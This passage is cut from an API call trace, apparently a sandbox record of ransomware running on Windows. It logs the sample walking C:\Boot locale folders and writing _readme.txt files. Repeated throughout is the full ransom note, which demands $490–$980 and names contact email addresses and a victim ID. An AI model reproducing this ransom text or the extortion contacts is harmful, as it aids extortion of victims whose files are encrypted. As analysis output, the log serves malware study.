PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.045] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.046] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.046] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.046] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0210.046] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.046] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.046] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.046] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.047] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0210.047] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.047] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.047] PathFindFileNameW (pszPath="") returned="" [0210.047] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.047] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.047] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.047] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.048] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0210.048] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0210.048] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.048] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.048] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.048] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.048] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0210.048] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.049] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.049] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.049] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.049] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0210.049] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.049] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.049] PathFindFileNameW (pszPath="") returned="" [0210.049] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.050] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.050] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.050] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.050] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0210.050] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0210.050] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.050] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.050] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.051] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.051] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0210.051] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.051] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.051] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.051] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.051] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0210.051] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.051] PathFindFileNameW (pszPath="") returned="" [0210.052] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.052] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.052] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.052] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.052] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0210.052] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0210.053] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.053] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look 